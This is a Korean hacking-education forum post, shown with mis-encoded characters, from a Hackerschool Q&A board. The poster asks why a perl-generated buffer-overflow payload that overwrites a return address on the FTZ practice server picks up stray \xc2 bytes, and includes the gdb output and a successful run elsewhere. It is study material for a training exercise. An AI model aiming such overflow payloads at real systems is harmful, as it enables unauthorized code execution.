¸®´ª½º

 3923, 5/197 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   smile0909
   ftz ¼­¹ö¿¡¼­ Çí»çÄڵ尡 ½ºÅÿ¡ »ðÀÔµÇÁö ¾Ê¾Æ¿ä¤Ð

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4392 [º¹»ç]


°£´ÜÇÑ BOF¿¡ ´ëÇÑ °­ÀÇÀڷḦ ¸¸µé±â À§Çؼ­,  ftz¼­¹öÀÇ guest°èÁ¤À¸·Î ·Î±×ÀÎÇÏ¿© Å×½ºÆ® ÁßÀä.
ÄÄÆÄÀϽÿ¡ °É ¼ö ÀÖ´Â ¿É¼ÇÀº ¸ðµÎ °Ç »óÅÂÀ̱¸¿ä. (-z execstack -fno-builtin -mpreferred-stack-boundary=2)

bof°ø°ÝÀ¸·Î ½ºÅÃÀÇ return addressºÎºÐ¿¡ ÁÖ¼Ò°ª(\x92\x83\x04\x08)À» ³ÖÀ¸·Á°í Çϴµ¥ ¾ÈµÇ±æ·¡..
ÄÚ¾î´ýÇÁ¸¦ ¶°º¸´Ï, ÀÚ²Ù \xc2\x92\xc2\x83\xc2\x04\xc2\x08¿Í °°ÀÌ, Áß°£¿¡ \xc2°ªÀÌ µé¾î°¡°í ÀÖ´Â »óȲÀ̳׿ä.

charÇü ¹è¿­ bufferÅ©±â´Â 4À̱¸¿ä.
¾Æ·¡Ã³·³ ³ª¿É´Ï´Ù..

[guest@ftz test]$ perl -e 'print "a"x4,"b"x4,"\x92\x83\x04\x08"' | ./test
aaaabbbb혪혘
Segmentation fault (core dumped)
[guest@ftz test]$ gdb test core.9330
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
Core was generated by `./test'.
Program terminated with signal 11, Segmentation fault.
Cannot access memory at address 0x400160b0
#0  0x83c292c2 in ?? ()


Ȥ½Ã ½ºÅÃÂÊ¿¡ Çí»çÄڵ带 ³ÖÀ¸¸é Áß°£¿¡ ¾²·¹±â°ªÀÌ µé¾î°¡µµ·Ï ÀǵµÇϽŰǰ¡¿ä?
¿¹Àü¿¡´Â ºÐ¸íÈ÷ 됬´ø ¹æ½ÄÀε¥... ÀÌ»óÇϳ׿ä.. ÀÛ³âÀΰ¡ Á¦ÀÛ³âÀΰ¡´Â ºÐ¸íÈ÷ ftz¼­¹ö¿¡¼­µµ 됬´ø °Í °°Àºµ¥ ¿Ö °©Àڱ⠾ȵÇÁÒ?¤Ð¤Ð

+
¾Æ·¡¿Í °°ÀÌ, BOF¿øÁ¤´ë ¼­¹ö¿¡¼­´Â Àß µ¿ÀÛÇÕ´Ï´Ù. (Á¦°¡ guest°èÁ¤À» µû·Î ¸¸µé¾îµ×½À´Ï´Ù.)
[guest@localhost test]$ perl -e 'print "a"x4,"b"x4,"\x38\x84\x04\x08"' | ./test
aaaabbbb8?
bof success!
  Hit : 2691     Date : 2015/01/23 04:38


    
3843   ftz level1 ¿¡¼­ Áú¹® ÀÖ½À´Ï´Ù µµ¿ÍÁÖ¼¼¿ä ¤Ì¤Ð     bg3209
 03/04 2944
3842   ftz Áú¹®     ju031230
 03/02 2562
3841   I can't login with root on terminal (OS : fedora17)[6]     ±èº´±Ç
 01/29 2993
  ftz ¼­¹ö¿¡¼­ Çí»çÄڵ尡 ½ºÅÿ¡ »ðÀÔµÇÁö ¾Ê¾Æ¿ä¤Ð     smile0909
 01/23 2690
3839   ÅÚ³Ý ftz ¼­¹ö guest ºñ¹Ð¹øÈ£°¡ ¹º°¡¿ä[2]     ÁãÀÌ
 01/06 3239
3838   ÇØÄ¿½ºÄ𠸮´ª½º Æ®·¹À̴׿¡¼­ guest ºñ¹Ð¹øÈ£°¡ ¹º°¡¿ä??[1]     six6th
 01/06 3139
3837   hackerschool ·¹µåÇò ¸®´ª½º9.0°ü·ÃÁú¹®Àε¥¿ä     qotjddn6593
 01/06 2413
3836   CENT OS USB ¼³Ä¡ÈÄ ¹®Á¦     ifocean
 12/26 3156
3835   falcon os second °¡Áö°í ÀÖÀ¸½Å ¸ÚÁøºÐ ¾ø³ª¿ä?     jungkenji
 12/20 2902
3834   °©Àڱ⠻ý°¢³ª¼­ Áú¹®µå¸®´Âµ¥ ½º¸¶Æ®Æù¿¡ vmware[2]     nmy89
 12/17 3919
3833   ¸®´ª½º skelÀ̶ó´Â°Ô Á¤È­È÷¸ÓÁÒ?[2]     kdhan16
 12/17 4138
3832   kali linux¸¦ °¡»ó¸Ó½ÅÀ¸·Î ½ÇÇà½ÃÄ×À»¶§ ±Ã±ÝÇÑÁ¡[1]     cckcamp
 12/07 4114
3831   ÇØÄ¿½ºÄð°­Á ¸Û¸ÛÀÌÄÄÇ»Å͸¦Ã£¾Æ¶ó¿¡¼­.. ssh Æ÷Æ®¹øÈ£¾Ë¶§ telnetÀ¸·Î[1]     alsrbdu
 12/07 3639
3830   ¸®´ª½º x windows (VMware)[1]     inwoong32
 11/30 2682
3829   Ã¥À» °í¹ÎÇÏ°í ÀÖ½À´Ï´Ù.[2]     calliope7487
 11/19 3271
3828   ¹éÆ®·¢5 wlan0 Ĩ¼ÂÀÌ UnknownÀ¸·Î ³ªÅ¸³ª´Â°Ô ¹®Á¦°¡ µÇ³ª¿ä?     jeah9441
 11/14 2906
3827   VMware Backtrack5 USB¹«¼±·£Ä«µå Áú¹®     jeah96
 11/11 3287
3826   vi ¼Ò½º Äڵ带 º¸°í ½ÍÀºµ¥¿ä[2]     lionpoo
 11/11 3033
3825   °¡»ó¸Ó½Å¿¡ ¿ìºÐÅõ¸¦ ±ò°í ssh ¼³Ä¡ÈÄ °¡»ó¸Ó½Å ÀÚü¿¡¼­ Æ÷Æ®Æ÷¿öµù°ú °øÀ¯±â Æ÷Æ®Æ÷¿öµù¿¡¼­ÀÇ ¹®Á¦°¡...     ehaakdl
 11/01 3204
3824   ¸®´ª½º Å͹̳Π⠾°Ô ¶ç¿ì³ª¿ä?[2]     cksrjfl1996
 10/09 4970
[1][2][3][4] 5 [6][7][8][9][10]..[197]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org